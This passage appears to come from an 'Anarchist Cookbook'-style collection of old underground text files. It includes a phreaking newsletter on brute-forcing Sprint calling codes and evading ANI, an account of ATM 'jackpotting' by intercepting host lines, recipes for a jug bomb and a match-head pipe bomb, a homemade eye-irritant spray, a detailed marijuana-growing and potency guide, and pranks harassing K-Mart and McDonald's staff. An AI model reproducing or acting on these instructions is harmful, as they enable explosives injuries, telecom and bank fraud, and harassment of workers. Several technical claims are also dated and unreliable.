3. Beginning to move more and more your eyes open, bringing you up to full
conscious.
4. You are up, up, up and awakening more and more.
5. You are awake and feeling great.
And that's it! You now know how to hypnotize yourself and someone else.
You will learn more and more as you experiment.
67. The Remote Informer Issue #1 by Tracker and Noman Bates
Introduction
Welcome to the first issue of 'The Remote Informer'! This newsletter is reader
supported. If the readers of this newsletter do not help support it, then it
will end. We are putting this out to help out the
ones that would like to read it. If you are one of those who thinks they know
everything, then don't bother reading it. This newsletter is not anything like
the future issues. The future issues will contain
several sections, as long as reader input is obtained. Below is an outline
overview of the sections in the future issues.
I/O Board (Input/Output Board)
The I/O Board is for questions you have, that we might be able to answer or at
least refer you to someone or something. We will be honest if we cannot help
you. We will not make up something, or
to the effect, just to make it look like we answered you. There will be a
section in the I/O Board for questions we cannot answer, and then the readers
will have the opportunity to answer it. We will
print anything that is reasonable in the newsletter, even complaints if you feel
like you are better than everyone.
NewsCenter
This section will be for news around the underworld. It will talk of busts of
people in the underworld and anything else that would be considered news. If you
find articles in the paper, or something
happens in your local area, type it up, and upload it to one of the boards
listed at the end of the newsletter. Your handle will be placed in the article.
If you do enter a news article, please state the date
and from where you got it.
Feature Section
The Feature Section will be the largest of the sections as it will be on the
topic that is featured in that issue. This will be largely reader input which
will be sent in between issues. At the end of the issue
at hand, it will tell the topic of the next issue, therefore, if you have
something to contribute, then you will have ample time to prepare your article.
Hardware/Software Review
In this section, we will review the good and bad points of hardware and software
related to the underworld. It will be an extensive review, rather than just a
small paragraph.
The Tops
This section will be the area where the top underworld BBS's, hacking programs,
modem scanners, etc. will be shown. This will be reader selected and will not be
altered in anyway. The topics are
listed below.
· Underworld BBS's (Hack, Phreak, Card, Anarchy, etc.)
· Hacking programs for Hayes compatables
· Hacking programs for 1030/Xm301 modems
· Modem scanners for Hayes compatables
· Modem scanners for 1030/Xm301 modems
· Other type illegal programs
· You may add topics to the list if enough will support it.
Tid Bits
This will contain tips and helpful information sent in by the users. If you have
any information you wish to contribute, then put it in a text file and upload it
to one of the BBS's listed at the end of the
newsletter. Please, no long distance codes, mainframe passwords, etc. We may add
other sections as time goes by. This newsletter will not be put out on a regular
basis. It will be put out when we
have enough articles and information to put in it. There may be up to 5 a month,
but there will always be at least one a month. We would like you, the readers,
to send us anything you feel would be of
interest to others, like hacking hints, methods of hacking long distance
companies, companies to card from, etc. We will maintain the newsletter as long
as the readers support it. That is the end of the
introduction, but take a look at this newsletter, as it does contain information
that may be of value to you.
Hacking Sprint: The Easy Way
If you hack US Sprint, 950-0777 (by the way it is no longer GTE Sprint), and you
are frustrated at hacking several hours only to find one or two codes, then
follow these tips, and it will increase your
results tremendously. First, one thing that Mr. Mojo proved is that Sprint will
not store more than one code in every hundred numbers. (ex: 98765400 to 98765499
may contain only one code).
There may NOT be a code in that hundred, but there will never be more than one.
Sprint's 9 digit codes are stored from 500000000 through 999999999. In the
beginning of Sprint's 950 port, they
only had 8 digit codes. Then they started converting to 9 digit codes, storing
all 8 digit codes between 10000000 and 49999999 and all 9 digit codes between
500000000 and 999999999. Sprint has
since canceled most 8 digit codes, although there are a few left that have been
denoted as test codes. Occasionally, I hear of phreaks saying they have 8 digit
codes, but when verifying them, the codes
were invalid. Now, where do you start? You have already narrowed the low and
high numbers in half, therefore already increasing your chances of good results
by 50 percent. The next step is to find
a good prefix to hack. By the way, a prefix, in hacking terms, is the first
digits in a code that can be any length except the same number of digits the
code is. (ex: 123456789 is a code. That means 1,
12, 123, 1234, 12345, 123456, 1234567, and 12345678 are prefixes) The way you
find a good prefix to hack is to manually enter a code prefix. If when you enter
the code prefix and a valid
destination number and you do not hear the ringing of the recording telling you
that the code is invalid until near the end of the number, then you know the
prefix is valid. Here is a chart to follow when
doing this:
Code - Destination Range good codes exist
-------------------------------------------------
123456789 - 6192R 123400000 - 123499999
123456789 - 619267R 123450000 - 123459999
123456789 - 61926702R 123456000 - 123456999
123456789 - 6192670293R 123456700 - 123456799
-------------------------------------------------
( R - Denotes when ring for recording starts)
To prove this true, I ran a test using OmniHack 1.3p, written by Jolly Joe. In
this test I found a prefix where the last 3 digits were all I had to hack. I
tested each hundred of the 6 digit prefix finding
that all but 4 had the ring start after the fourth digit was dialed in the
destination number. The other four did not ring until I had finished the entire
code. I set OmniHack to hack the prefix + 00 until
prefix + 99. (ex: xxxxxxy00 to xxxxxxy99: where y is one of the four numbers
that the ring did not start until the dialing was completed.) Using this method,
I found four codes in a total of 241 attempts
using ascending hacking (AKA: Sequential). Below you will see a record of my
hack:
Range of hack Codes found Tries
xxxxxx300 - xxxxxx399 xxxxxx350 50
xxxxxx500 - xxxxxx599 xxxxxx568 68
xxxxxx600 - xxxxxx699 xxxxxx646 46
xxxxxx800 - xxxxxx899 xxxxxx877 77
Totals 4 codes 241
As you see, these methods work. Follow these guidelines and tips and you should
have an increase in production of codes in the future hacking Sprint. Also, if
you have any hints/tips you think others
could benefit from, then type them up and upload them to one of the boards at
the end of the newsletter.
Rumors: Why Spread Them?
Do you ever get tired of hearing rumors? You know, someone gets an urge to
impress others, so they create a rumor that some long distance company is now
using tracing equipment. Why start
rumors? It only scares others out of phreaking, and then makes you, the person
who started the rumor, look like Mr. Big. This article is short, but it should
make you aware of the rumors that people
spread for personal gain. The best thing to do is to denote them as a rumor
starter and then leave it at that. You should not rag on them constantly, since
if the other users cannot determine if it is fact
or rumor, then they should suffer the consequences.
The New Sprint FON Calling Cards
US Sprint has opened up a new long distance network called the Fiber Optic
Network (FON), in which subscribers are given calling cards. These calling cards
are 14 digits, and though, seem
randomly generated, they are actually encrypted. The rumors floating around
about people getting caught using the Sprint FON calling cards are fact, not
rumors. The reason people are getting caught
is that they confuse the FON calling cards with the local 950 port authorization
codes. If you will remember, you never use AT&T calling cards from you home
phone. It has ANI capability, which is
not tracing, but rather the originating phone number is placed on the bill as
soon as the call is completed. They know your phone number when you call the 800
access port, but they do not record it
until your call is completed. Also, through several of my hacks, I came up with
some interesting information surrounding the new Sprint network. They are listed
below.
800-877-0000 - This number is for information on US Sprint's 800 calling card
service. I have not played around with it, but I believe it is for trouble or
help with the FON calling cards. I am not sure
if it is for subscribing to the FON network.
800-877-0002 - You hear a short tone, then nothing.
800-877-0003 - US Sprint Alpha Test Channel #1
800-877-(0004-0999) - When you call these numbers, you get a recording saying:
"Welcome to US Sprint's 1 plus service." When the recording stops, if you hit
the pound key (#) you will get the
calling card dial tone.
Other related Sprint numbers
800-521-4949 - This is the number that you subscribe to US Sprint with. You may
also subscribe to the FON network on this number. It will take 4 to 5 weeks for
your calling card to arrive.
10777 - This is US Sprint's equal access number. When you dial this number, you
then dial the number you are calling, and it will be billed through US Sprint,
and you will receive their long distance
line for that call. Note that you will be billed for calls made through equal
access. Do not mistake it to be a method of phreaking, unless used from a remote
location. If you are in US Sprint's 1+ service
then call 1+700-555-1414, which will tell you which long distance company you
are using. When you hear: "Thank you for choosing US Sprint's 1 plus service,"
hit the pound key (#), and then you
will get the US Sprint dial tone. This however is just the same as if you are
calling from your home phone if you dial direct, so you would be billed for
calls made through that, but there are ways to use
this to your advantage as in using equal access through a PBX.
Automatic Number Identification (ANI)
The true definition for Automatic Number Identification has not been widely
known to many. Automatic Number Identification, (AKA: ANI), is the process of
the destination number knowing the
originating number, which is where you are calling from. The method of achieving
this is to send the phone number that you are calling from in coded form ahead
of the destination number. Below is an
example of this.
ANI Method
Dial: 267-0293
Sent: ********2670293
* - Denotes the originating number which is coded and sent before the
number
As you noticed there are 8 digits in the coded number. This is because, at least
I believe, it is stored in a binary-like form. Automatic Number Identification
means a limited future in phreaking. ANI
does not threaten phreaking very much yet, but it will in the near future. A new
switching system will soon be installed in most cities that are covered by ESS,
Electronic Switching System, now. The
system will have ANI capabilities which will be supplied to the owners of phone
lines as an added extra. The owner's phone will have an LED read-out that will
show the phone number of the people
that call you. You will be able to block some numbers, so that people cannot
call you. This system is in the testing stages currently, but will soon be
installed across most of the country. As you see,
this will end a large part of phreaking, until we, the phreakers, can come up
with an alternative. As I have been told by several, usually reliable, people,
this system is called ISS, which I am not sure of
the meaning of this, and is being tested currently in Rhode Island. 800 in-watts
lines set up by AT&T support ANI. The equipment to decode an ANI coded
origination number does not costs as much
as you would expect. 950 ports do not offer ANI capability, no matter what you
have been told. The 950 ports will only give the city in which they are based,
this usually being the largest in the state,
sometimes the capitol. One last thing that I should tell you is that ANI is not
related to tracing. Tracing can be done on any number whether local, 950, etc.
One way around this, especially when
dialing Alliance TeleConferencing, is to dial through several extenders or
ports. ANI will only cover the number that is calling it, and if you call
through a number that does not support ANI, then your
number will never be known.
68. Jackpotting ATM Machines by The Jolly Roger
JACKPOTTING was done rather successfully a while back in (you guessed it) New
York. What the culprits did was sever (actually cross over) the line between the
ATM and the host. Insert a
microcomputer between the ATM and the host. Insert a fraudulent card into the
ATM. (By card I mean cash card, not hardware.) What the ATM did was: send a
signal to the host, saying "Hey! Can
I give this guy money, or is he broke, or is his card invalid?" What the
microcomputer did was: intercept the signal from the host, discard it, send
"there's no one using the ATM" signal. What the host
did was: get the "no one using" signal, send back "okay, then for God's sake
don't spit out any money!" signal to ATM. What the microcomputer did was
intercept the signal (again), throw it away
(again), send "Wow! That guy is like TOO rich! Give him as much money as he
wants. In fact, he's so loaded, give him ALL the cash we have! He is really a
valued customer." signal. What the
ATM did: what else? Obediently dispense cash till the cows came home (or very
nearly so). What the crooks got was well in excess of $120,000 (for one
weekend's work), and several years when
they were caught. This story was used at a CRYPTOGRAPHY conference I attended a
while ago to demonstrate the need for better information security. The lines
between ATM's & their hosts are
usually 'weak' in the sense that the information transmitted on them is
generally not encrypted in any way. One of the ways that JACKPOTTING can be
defeated is to encrypt the information passing
between the ATM and the host. As long as the key cannot be determined from the
ciphertext, the transmission (and hence the transaction) is secure. A more
believable, technically accurate story might
concern a person who uses a computer between the ATM and the host to determine
the key before actually fooling the host. As everyone knows, people find
cryptanalysis a very exciting and
engrossing subject..don't they? (Hee-Hee)
_____ ______
| |-<<-| |-<<-| |
|ATM| micro |Host|
|___|->>-| |->>-|____|
The B of A ATM's are connected through dedicated lines to a host computer as the
Bishop said. However, for maintenance purposes, there is at least one separate
dial-up line also going to that same
host computer. This guy basically BS'ed his way over the phone till he found
someone stupid enough to give him the number. After finding that, he had has
Apple hack at the code. Simple.
Next, he had a friend go to an ATM with any B of A ATM card. He stayed at home
with the Apple connected to the host. When his friend inserted the card, the
host displayed it. The guy with the
Apple modified the status & number of the card directly in the host's memory. He
turned the card into a security card, used for testing purposes. At that point,
the ATM did whatever it's operator told it
to do.
The next day, he went into the bank with the $2000 he received, talked to the
manager and told him every detail of what he'd done. The manager gave him his
business card and told him that he had a
job waiting for him when he got out of school.
Now, B of A has been warned, they might have changed the system. On the other
hand, it'd be awful expensive to do that over the whole country when only a
handful of people have the resources and
even less have the intelligence to duplicate the feat. Who knows?
69. Jug Bomb by The Jolly Roger
Take a glass jug, and put 3 to 4 drops of gasoline into it. Then put the cap on,
and swish the gas around so the inner surface of the jug is coated. Then add a
few drops of potassium permanganate
solution into it and cap it. To blow it up, either throw it at something, or
roll it at something.
70. Fun at K-Mart by The Jolly Roger
Well, first off, one must realize the importance of K-Marts in society today.
First off, K-Marts provide things cheaper to those who can't afford to shop at
higher quality stores. Although, all I ever see
in there is minorities and Senior Citizens, and the poor people in our city.
Personally, I wouldn't be caught dead in there. But, once, I did. You see, once,
after The Moon Roach and Havoc Chaos
(Dear friends of mine) and I were exploring such fun things as rooftops, we came
along a K-Mart. Amused, and cold for that matter, we wandered in. The Tension
mounts. As we walked up to the
entrance, we were nearly attacked by Youth Groups selling cheap cookies, and
wheelchair sticken people selling American Flags. After laughing at these
people, we entered. This is where the real fun
begins... First, we wandered around the store, and turned on all the blue lights
we could find. That really distracts and confuses the attendents...Fun to do...
The first neat thing, is to go to the section of
the store where they sell computers. Darkness engulfs the earth the day they
find Apple Computers being sold there. Instead, lesser computers like the
laughable C-64 can be found there...Turn it on,
and make sure nobody's looking...Then, once in Basic, type...
]10 PRINT "Fuck the world! Anarchy Rules!" (or something to that effect.)
]20 GOTO 10 and walk away.
Also, set the sample radios in the store to a satanic rock station, and turn the
radio off. Then, set the alarm for two minutes ahead of the time displayed
there. Turn the volume up all the way, and walk
away. After about two minutes, you will see the clerk feebly attempt to turn the
radio down or off. It's really neat to set ten or more radios to different
stations, and walk away. One of my favorite
things to do, is to get onto the intercom system of the store. Easier typed then
done. First, check out the garden department. You say there's no attendent
there? Good. Sneak carefully over to the
phone behind the cheap counter there, and pick it up. Dial the number
corresponding to the item that says 'PAGE'... And talk. You will note that your
voice will echo all over the bowels of K-Mart. I
would suggest announcing something on the lines of: "Anarchy rules!!"
71. Mace Substitute by The Jolly Roger
· 3 parts Alcohol
· ½ part Iodine
· ½ part Salt
-or-
· 3 parts Alcohol
· 1 part Iodized Salt (Mortons)
It's not actual mace, but it does a damn good job on the eyes...
72. How to grow Marijuana by The Jolly Roger
MARIJUANA
Marijuana is a deciduous plant which grows from seeds. The fibrous section of
the plant was (has been replaced by synthetics) used to make rope. The flowering
tops, leaves, seeds, and resin of the
plant is used by just about everyone to get HIGH. Normally, the vegetable parts
of the plant are smoked to produce this "high," but they can also be eaten. The
active ingredient in marijuana resin is
THC (Tetahydrocannabinol). Marijuana contains from 1%-4% THC (4% must be
considered GOOD dope). Marijuana grows wild in many parts of the world, and is
cultivated in Mexico, Vietnam,
Africa, Nepal, India, South America, etc. The marijuana sold in the United
States comes primarily from, yes, the United States. It is estimated that at
least 50% of the grass on the streets in America is
homegrown. The next largest bunch comes across the borders from Mexico, with
smaller amounts filtering in from Panama, occasionally South America, and
occasionally, Africa. Hashish is the pure
resin of the marijuana plant, which is scraped from the flowering tops of the
plant and lumped together. Ganja is the ground-up tops of the finest plants. (It
is also the name given to any sort of marijuana
in Jamaica.) Marijuana will deteriorate in about two years if exposed to light,
air or heat. It should always be stored in cool places. Grass prices in the
United States are a direct reflection of the laws of
supply and demand (and you thought that high school economics would never be
useful). A series of large border busts, a short growing season, a bad crop, any
number of things can drive the price of
marijuana up. Demand still seems to be on the increase in the US, so prices
seldom fall below last year's level. Each year a small seasonal drought occurs,
as last year's supply runs low, and next year's
crop is not up yet. Prices usually rise about 20%-75% during this time and then
fall back to "normal." Unquestionably, a large shortage of grass causes a
percentage of smokers to turn to harder drugs
instead. For this reason, no grass control program can ever be beneficial or
"successful."
GROW IT!
There is one surefire way of avoiding high prices and the grass DT's: Grow your
own. This is not as difficult as some "authorities" on the subject would make
you believe. Marijuana is a weed, and a
fairly vivacious one at that, and it will grow almost in spite of you.
OUTDOORS
Contrary to popular belief, grass grows well in many place on the North American
continent. It will flourish even if the temperature does not raise above 75°.
The plants do need a minimum of eight
hours of sunlight per day and should be planted in late April/early May, BUT
DEFINITELY, after the last frost of the year. Growing an outdoor, or "au
naturel", crop has been the favored method over
the years, because grass seems to grow better without as much attention when in
its natural habitat. Of course, an outdoors setting requires special precautions
not encountered with an indoors crop;
you must be able to avoid detection, both from law enforcement freaks and common
freaks, both of whom will take your weed and probably use it. Of course, one
will also arrest you. You must also
have access to the area to prepare the soil and harvest the crop. There are two
schools of thought about starting the seeds. One says you should start the
seedlings for about ten days in an indoor
starter box (see the indoor section) and then transplant. The other theory is
that you should just start them in the correct location. Fewer plants will come
up with this method, but there is no shock of
transplant to kill some of the seedlings halfway through. The soil should be
prepared for the little devils by turning it over a couple of times and adding
about one cup of hydrated lime per square yard of
soil and a little bit (not too much, now) of good water soluble nitrogen
fertilizer. The soil should now be watered several times and left to sit about
one week. The plants should be planted at least three
feet apart, getting too greedy and stacking them too close will result in
stunted plants. The plants like some water during their growing season, BUT not
too much. This is especially true around the
roots, as too much water will rot the root system. Grass grows well in corn or
hops, and these plants will help provide some camouflage. It does not grow well
with rye, spinach, or pepperweed. It is
probably a good idea to plant in many small, broken patches, as people tend to
notice patterns.
GENERAL GROWING INFO
Both the male and he female plant produce THC resin, although the male is not as
strong as the female. In a good crop, the male will still be plenty smokable and
should not be thrown away under any
circumstances. Marijuana can reach a height of twenty feet (or would you rather
wish on a star) and obtain a diameter of 4½ inches. If normal, it has a sex
ratio of about 1:1, but this can be altered in
several ways. The male plant dies in the 12th week of growing, the female will
live another 3-5 weeks to produce her younguns. Females can weigh twice as much
as males when they are mature.
Marijuana soil should compact when you squeeze it, but should also break apart
with a small pressure and absorb water well. A nice test for either indoor or
outdoor growing is to add a bunch of
worms to the soil, if they live and hang around, it is good soil, but if they
don't, well, change it. Worms also help keep the soil loose enough for the
plants to grow well.
SEEDS
To get good grass, you should start with the right seeds. A nice starting point
is to save the seeds form the best batch you have consumed. The seeds should be
virile, that is, they should not be gray and
shriveled up, but green, meaty, and healthy appearing. A nice test is to drop
the seeds on a hot frying pan. If they "CRACK," they are probably good for
planting purposes. The seeds should be soaked
in distilled water overnight before planting. BE SURE to plant in the ground
with the pointy end UP. Plant about ½" deep. Healthy seeds will sprout in about
five days.
SPROUTING
The best all around sprouting method is probably to make a sprouting box (as
sold in nurseries) with a slated bottom or use paper cups with holes punched in
the bottoms. The sprouting soil should be
a mixture of humus, soil, and five sand with a bit of organic fertilizer and
water mixed in about one week before planting. When ready to transplant, you
must be sure and leave a ball of soil around the
roots of each plant. This whole ball is dropped into a baseball-sized hold in
the permanent soil. If you are growing/transplanting indoors, you should use a
green safe light (purchased at nurseries) during
the transplanting operation. If you are transplanting outdoors, you should time
it about two hours before sunset to avoid damage to the plant. Always wear
cotton gloves when handling the young plants.
After the plants are set in the hole, you should water them. It is also a good
idea to use a commercial transplant chemical (also purchased at nurseries) to
help then overcome the shock.
INDOOR GROWING
Indoor growing has many advantages, besides the apparent fact that it is much
harder to have your crop "found," you can control the ambient conditions just
exactly as you want them and get a
guaranteed "good" plant. Plants grown indoors will not appear the same as their
outdoor cousins. They will be scrawnier appearing with a weak stems and may even
require you to tie them to a growing
post to remain upright, BUT THEY WILL HAVE AS MUCH OR MORE RESIN! If growing in
a room, you should put tar paper on the floors and then buy sterilized bags of
soil form a nursery. You
will need about one cubic foot of soil for each plant. The plants will need
about 150 mL. of water per plant/per week. They will also need fresh air, so the
room must be ventilated. (However, the fresh
air should contain NO TOBACCO smoke.) At least eight hours of light a day must
be provided. As you increase the light, the plants grow faster and show more
females/less males. Sixteen hours of
light per day seems to be the best combination, beyond this makes little or no
appreciable difference in the plant quality. Another idea is to interrupt the
night cycle with about one hour of light. This
gives you more females. The walls of your growing room should be painted white
or covered with aluminum foil to reflect the light. The lights themselves can be
either bulbs of fluorescent. Figure about
75 watts per plant or one plant per two feet of fluorescent tube. The
fluorescents are the best, but do not use "cool white" types. The light sources
should be an average of twenty inches from the plant
and NEVER closer than 14 inches. They may be mounted on a rack and moved every
few days as the plants grow. The very best light sources are those made by
Sylvania and others especially for
growing plants (such as the "gro lux" types).
HARVESTING AND DRYING
The male plants will be taller and have about five green or yellow sepals, which
will split open to fertilize the female plant with pollen. The female plant is
shorter and has a small pistillate flower, which
really doesn't look like a flower at all but rather a small bunch of leaves in a
cluster. If you don't want any seeds, just good dope, you should pick the males
before they shed their pollen as the female
will use some of her resin to make the seeds. After another three to five weeks,
after the males are gone, the females will begin to wither and die (from
loneliness?), this is the time to pick. In some
nefarious Middle Eastern countries, farmers reportedly put their beehives next
to fields of marijuana. The little devils collect the grass pollen for their
honey, which is supposed to contain a fair dosage of
THC. The honey is then enjoyed by conventional methods or made into ambrosia. If
you want seeds - let the males shed his pollen then pick him. Let the female go
another month and pick her. To cure
the plants, they must be dried. On large crops, this is accomplished by
constructing a drying box or drying room. You must have a heat source (such as
an electric heater) which will make the box/room
each 130°. The box/room must be ventilated to carry off the water-vapor-laden
air and replace it with fresh. A good box can be constructed from an orange
crate with fiberglass insulated walls, vents
in the tops, and screen shelves to hold the leaves. There must be a baffle
between the leaves and the heat source. A quick cure for smaller amounts is to:
cut the plant at the soil level and wrap it in a
cloth so as not to loose any leaves. Take out any seeds by hand and store. Place
all the leaves on a cookie sheet or aluminum foil and put them in the middle
shelf of the oven, which is set on "broil." In
a few seconds, the leaves will smoke and curl up, stir them around and give
another ten seconds before you take them out.
TO INCREASE THE GOOD STUFF
There are several tricks to increase the number of females, or the THC content
of plants: You can make the plants mature in 36 days if you are in a hurry, by
cutting back on the light to about 14 hours,
but the plants will not be as big. You should gradually shorten the light cycle
until you reach fourteen hours. You can stop any watering as the plants begin to
bake the resin rise to the flowers. This will
increase the resin a bit. You can use a sunlamp on the plants as they begin to
develop flower stalks. You can snip off the flower, right at the spot where it
joins the plant, and a new flower will form in a
couple of weeks. This can be repeated two or three times to get several times
more flowers than usual.
If the plants are sprayed with Ethrel early in their growing stage, they will
produce almost all female plants. This usually speeds up the flowering also, it
may happen in as little as two weeks. You can
employ a growth changer called colchicine. This is a bit hard to get and
expensive. (Should be ordered through a lab of some sort and costs about $35 a
gram.) To use the colchicine, you should
prepare your presoaking solution of distilled water with about 0.10 per cent
colchicine. This will cause many of the seeds to die and not germinate, but the
ones that do come up will be polyploid plants.
This is the accepted difference between such strains as "gold" and normal grass,
and yours will DEFINITELY be superweed. The problem here is that colchicine is a
poison in larger quantities and may
be poisonous in the first generation of plants. Bill Frake, author of
CONNOISSEUR'S HANDBOOK OF MARIJUANA runs a very complete colchicine treatment
down and warns against smoking
the first generation plants (all succeeding generations will also be polyploid)
because of this poisonous quality. However, the Medical Index shows colchicine
being given in very small quantities to
people for treatment if various ailments. Although these quantities are small,
they would appear to be larger than any you could receive form smoking a
seed-treated plant. It would be a good idea to
buy a copy of CONNOISSEUR'S, if you are planning to attempt this, and read Mr.
Drake's complete instructions. Another still-experimental process to increase
the resin it to pinch off the leaf tips as
soon as they appear from the time the plant is in the seedling stage on through
its entire life-span. This produces a distorted, wrecked-looking plant which
would be very difficult to recognize as
marijuana. Of course, there is less substance to this plant, but such wrecked
creatures have been known to produce so much resin that it crystallizes a strong
hash all over the surface of the plant - might
be wise to try it on a plant or two and see what happens.
PLANT PROBLEM CHART
Always check the overall environmental conditions prior to passing judgment -
soil around 7 pH or slightly less - plenty of water, light, fresh air, loose
soil, no water standing in pools.
SYMPTOM PROBABLY PROBLEM/CURE
Larger leaves turning yellow - smaller leaves still green. Nitrogen deficiency -
add nitrate of soda or organic fertilizer.
Older leaves will curl at edges, turn dark, possibly with a purple cast.
Phosphorous deficiency - add commercial phosphate.
Mature leaves develop a yellowish cast to least venial areas. Magnesium
deficiency - add commercial fertilizer with a magnesium content.
Mature leaves turn yellow and then become spotted with edge areas turning dark
gray. Potassium deficiency - add muriate of potash.
Cracked stems, no healthy support tissue. Boron deficiency - add any plant food
containing boron.
Small wrinkled leaves with yellowish vein systems. Zinc deficiency - add
commercial plant food containing zinc.
Young leaves become deformed, possibly yellowing. Molybdenum deficiency - use
any plant food with a bit of molybdenum in it.
EXTRA SECTION: BAD WEED/GOOD WEED
Can you turn bad weed into good weed? Surprisingly enough, the answer to this
often-asked inquiry is, yes! Like most other things in life, the amount of good
you are going to do relates directly to how
much effort you are going to put into it. There are no instant, supermarket
products which you can spray on Kansas catnip and have wonderweed, but there are
a number of simplified, inexpensive
processes (Gee, Mr. Wizard!) which will enhance mediocre grass somewhat, and
there are a couple of fairly involved processes which will do up even
almost-parsley weed into something worth
writing home about.
EASES
1. Place the dope in a container which allows air to enter in a restricted
fashion (such as a can with nail holes punched in its lid) and add a bunch of
dry ice, and the place the whole shebang in
the freezer for a few days. This process will add a certain amount of potency to
the product, however, this only works with dry ice, if you use normal, everyday
freezer ice, you will end up with a soggy
mess...
2. Take a quantity of grass and dampen it, place in a baggy or another socially
acceptable container, and store it in a dark, dampish place for a couple of
weeks (burying it also seems to
work). The grass will develop a mold which tastes a bit harsh, a and burns a
tiny bit funny, but does increase the potency.
3. Expose the grass to the high intensity light of a sunlamp for a full day or
so. Personally, I don't feel that this is worth the effort, but if you just
spent $400 of your friend's money for this brick
of super-Colombian, right-from-the-President's-personal-stash, and it turns out
to be Missouri weed, and you're packing your bags to leave town before the
people arrive for their shares, well, you
might at least try it. Can't hurt.
4. Take the undesirable portions of our stash (stems, seeds, weak weed, worms,
etc.) and place them in a covered pot, with enough rubbing alcohol to cover
everything. Now CAREFULLY
boil the mixture on an ELECTRIC stove or lab burner. DO NOT USE GAS - the
alcohol is too flammable. After 45 minutes of heat, remove the pot and strain
the solids out, SAVING THE
ALCOHOL. Now, repeat the process with the same residuals, but fresh alcohol.
When the second boil is over, remove the solids again, combine the two
quantities of alcohol and reboil until you have
a syrupy mixture. Now, this syrupy mixture will contain much of the THC formerly
hidden in the stems and such. One simply takes this syrup the thoroughly
combines it with the grass that one wishes to
improve upon.
SPECIAL SECTION ON RELATED SUBJECT MARYGIN
Marygin is an anagram of the words marijuana and gin, as in Eli Whitney. It is a
plastic tumbler which acts much like a commercial cotton gin. One takes about
one ounce of an herb and breaks it up.
This is then placed in the Marygin and the protruding knob is rotated. This
action turns the internal wheel, which separates the grass from the debris
(seeds, stems). It does not pulverize the grass as
screens have a habit of doing and is easily washable.
Marygin is available from:
P.O. Box 5827
Tuscon, Arizona 85703
$5.00
GRASS
Edmund Scientific Company
555 Edscorp Building
Barrington, New Jersy 08007
Free Catalog is a wonder of good things for the potential grass grower. They
have an electric thermostat greenhouse for starting plants. Lights which
approximate the true color balance of the sun and
are probably the most beneficial types available: 40 watt, 48 inch Indoor sun
bulb, 75 or 150 watt And, they have a natural growth regulator for plants
(Gibberellin) which can change height, speed
growth, and maturity, promote blossoming, etc. Each plant reacts differently to
treatment with Gibberellin...there's no fun like experimenting.
SUGGESTED READING
THE CONNOISSEUR'S HANDBOOK OF MARIJUANA, Bill Drake
Straight Arrow Publishing - $3½0
625 Third Street
San Francisco, California
FLASH
P.O.Box 16098
San Fransicso, California 94116
Stocks a series of pamphlets on grass, dope manufacture, cooking. Includes the
Mary Jane Superweed series.
73. Match Head Bomb by The Jolly Roger
Simple safety match heads in a pipe, capped at both ends, make a devastating
bomb. It is set off with a regular fuse. A plastic baggy is put into the pipe
before the heads go in to prevent detonation by
contact with the metal. Cutting enough match heads to fill the pipe can be
tedious work for one but an evening's fun for the family if you can drag them
away from the TV.
74. How To Terrorize McDonalds by The Jolly Roger
Now, although McDonalds is famous for it's advertising and making the whole
world think that the BigMac is the best thing to come along since sliced bread
(buns?), each little restaurant is as amateur
and simple as a new-found business. Not only are all the employees rather
inexperienced at what they're supposed to do, but they will just loose all
control when an emergency occurs....here we go!!!
First, get a few friends (4 is good...I'll get to this later) and enter the
McDonalds restaurant, talking loudly and reeking of some strange smell that
automatically makes the old couple sitting by the door
leave. If one of those pimply-faced goons is wiping the floor, then track some
crap all over it (you could pretend to slip and break your head, but you might
actually do so). Next, before you get the
food, find a table. Start yelling and releasing some strange body odor so
anybody would leave their table and walk out the door. Sit two friends there,
and go up to the counter with another. Find a
place where the line is short, or if the line is long say "I only wanna buy a
coke." and you get moved up. Now, you get to do the ordering ...heh heh heh.
Somebody always must want a plain hamburger
with absolutely nothing on it (this takes extra time to make, and drives the
little hamburger-makers insane)..order a 9-pack of chicken McNuggets...no, a 20
pack...no, three 6 packs...wait...go back to
the table and ask who wants what. Your other friend waits by the counter and
makes a pass at the female clerk. Get back to the thing and order three 6-packs
of chicken etc....now she says "What
kind of sauce would you like?". Of course, say that you all want barbecue sauce
one of your friends wants 2 (only if there are only 2 containers of barbecue
sauce left). Then they hafta go into the
storeroom and open up another box. Finally, the drinks...somebody wants coke,
somebody root beer, and somebody diet coke. After these are delivered, bring
them back and say "I didn't order a diet
coke! I ordered a sprite!" This gets them mad; better yet, turn down something
terrible that nobody wants to drink, so they hafta throw the drink away; they
can't sell it. After all the food(?) is handed to
you, you must never have enough money to pay. The clerk will be so angry and
confused that she'll let you get away with it (another influence on her is your
friend asking her "If you let us go, I'll go out
with you." and giving her a fake fone number). Now, back to your table. But
first, somebody likes ketchup and mustard. And plenty (too much) of napkins. Oh,
and somebody likes forks and knives,
so always end up breaking the ones you pick outta the box. Have your friends
yell out, ôYay!!!!! We have munchies!!" As loud as they can. That'll worry the
entire restaurant. Proceed to sit down. So,
you are sitting in the smoking section (by accident) eh? Well, while one of the
tobacco-breathers isn't looking, put a sign from the other side of the room
saying "Do not smoke here" and he'll hafta
move...then he goes into the real non-smoking section, and gets yelled at. He
then thinks that no smoking is allowed in the restaurant, so he eats outside (in
the pouring rain) after your meal is finished
(and quite a few splattered-opened ketchup packets are all over your table), try
to leave. But oops! Somebody has to do his duty in the men's room. As he goes
there, he sticks an uneaten hamburger
(would you dare to eat one of their hamburgers?) Inside the toilet, flushes it a
while, until it runs all over the bathroom. Oops! Send a pimply-faced teenager
to clean it up. (He won't know that brown
thing is a hamburger, and he'll get sick. Wheee!) As you leave the restaurant,
looking back at your uncleaned table, somebody must remember that they left
their chocolate shake there! The one that's
almost full!!!! He takes it then says "This tastes like crap!", Then he takes
off the lid and throws it into the garbage can...oops! He missed, and now the
same poor soul who's cleaning up the bathroom
now hasta clean up chocolate shake. Then leave the joint, reversing the "Yes,
we're open" sign (as a reminder of your visit) There you have it! You have just
put all of McDonalds into complete
mayhem. And since there is no penalty for littering in a restaurant, bugging
people in a public eatery (or throw-upery, in this case) you get off scot-free.
Wasn't that fun?
75. "Mentor's Last Words" by +++The Mentor+++
The following file is being reprinted in honor and sympathy for the many phreaks
and hackers that have been busted recently by the Secret Service.
The Conscience of a Hacker
Another one got caught today, it's all over the papers. "Teenager Arrested in
Computer Crime Scandal", "Hacker Arrested after Bank Tampering"... Damn kids.
They're all alike. But did you, in your
three-piece psychology and 1950's technobrain, ever take a look behind the eyes
of the hacker? Did you ever wonder what made him tick, what forces shaped him,
what may have molded him? I am
a hacker, enter my world... Mine is a world that begins with school... I'm
smarter than most of the other kids, this crap they teach us bores me... Damn
